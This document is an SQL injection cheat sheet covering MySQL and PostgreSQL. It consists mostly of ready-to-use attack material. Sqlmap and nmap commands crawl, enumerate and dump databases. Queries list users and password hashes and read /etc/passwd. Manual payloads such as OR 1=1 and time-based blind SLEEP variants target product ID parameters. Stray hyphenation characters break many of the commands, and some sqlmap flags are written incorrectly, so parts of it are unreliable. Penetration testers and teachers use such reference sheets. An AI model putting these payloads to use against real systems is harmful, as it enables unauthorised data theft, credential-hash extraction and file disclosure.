
SQL Injection Cheat Sheet

Automated tools

SQLMAP
sqlmap -u "­url­" --forms --batch --crawl=10 --level=5 --risk=3
NMAP
nmap -p80 --scri­pt=­htt­p-s­ql-­inj­ection --scri­pt-­arg­s=h­ttp­spi­der.ma­xpa­geo­cou­nt=200 <ta­rge­t>

MySQL

Version
SELECT @@version;
Comments
/* */ or #
Current user
SELECT user(); || SELECT system_user();
List users
SELECT user FROM mysql.user;
List password hashes
SELECT host, user, password FROM mysql.user;
Current database
SELECT database()
List databases
SELECT schema_name FROM information_schema.schemata; || SELECT distinct(db) FROM mysql.db
List tables
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
List columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
Find Tables From Column Name
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
Time delay
SELECT BENCHM­ARK­(10­000­00,­MD5­(‘A’)); SELECT SLEEP(5); # >= 5.0.12
Local File Access
…’ UNION ALL SELECT LOAD_F­ILE­(‘/­etc­/pa­sswd’) —
Hostname/IP Address
SELECT @@hostname;
Create user
CREATE USER test1 IDENTIFIED BY 'pass1'; --
Delete user
DROP USER test1; --
Location of the db file
SELECT @@datadir;
 

SQLMAP

sqlmap -u "­url­" -DBS
sqlmap -u "­url­" -table -D [database]
sqlmap -u "­url­" -columns -D [database] -T [table]
sqlmap -u "­url­" -dump -D [database] -T [table]

Manual attack

Quick detect INTEGERS
select 1 and row(1,­1)>­(select count(­),­con­cat­(CO­NCA­T(@­@VE­RSI­ON)­,0x­3a,­flo­or(­ran­d()­2))x from (select 1 union select 2)a group by x limit 1))
Quick detect STRINGS
'+(select 1 and row(1,­1)>­(select count(­),­con­cat­(CO­NCA­T(@­@VE­RSI­ON)­,0x­3a,­flo­or(­ran­d()­2))x from (select 1 union select 2)a group by x limit 1))+'
Clear SQL Test
produc­t.p­hp?id=4 produc­t.p­hp?­id=5-1 produc­t.p­hp?id=4 OR 1=1 produc­t.p­hp?­id=-1 OR 17-7=10
Blind SQL Injection
SLEEP(­25)-- SELECT BENCHM­ARK­(10­000­00,­MD5­('A'));
Real world sample
Produc­tID=1 OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1) OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1' OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1') OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1)) OR SLEEP(­25)=0 LIMIT 1-- Produc­tID­=SELECT SLEEP(­25)--

PostgreSQL

Version
SELECT version()
Comments
-- comment | /* comment */
Current user
SELECT user; SELECT current_user; SELECT session_user; SELECT usename FROM pg_user; SELECT getpgusername();
List users
SELECT usename FROM pg_user
List DBA Accounts
SELECT usename FROM pg_user WHERE usesuper IS TRUE
List password hashes
SELECT usename, passwd FROM pg_shadow -- priv
Current database
SELECT current_database()
List databases
SELECT datname FROM pg_database
List tables
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)
List columns
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')
Find Tables From Column Name
SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%';
Time delay
SELECT pg_sle­ep(10);
Local File Access
CREATE TABLE mydata(t text); COPY mydata FROM ‘/etc/­pas­swd’;
Hostname/IP Address
SELECT inet_server_addr();
Port
SELECT inet_server_port();
Create user
CREATE USER test1 PASSWORD 'pass1' CREATEUSER
Delete user
DROP USER test1;
Location of the db file
SELECT current_setting('data_directory');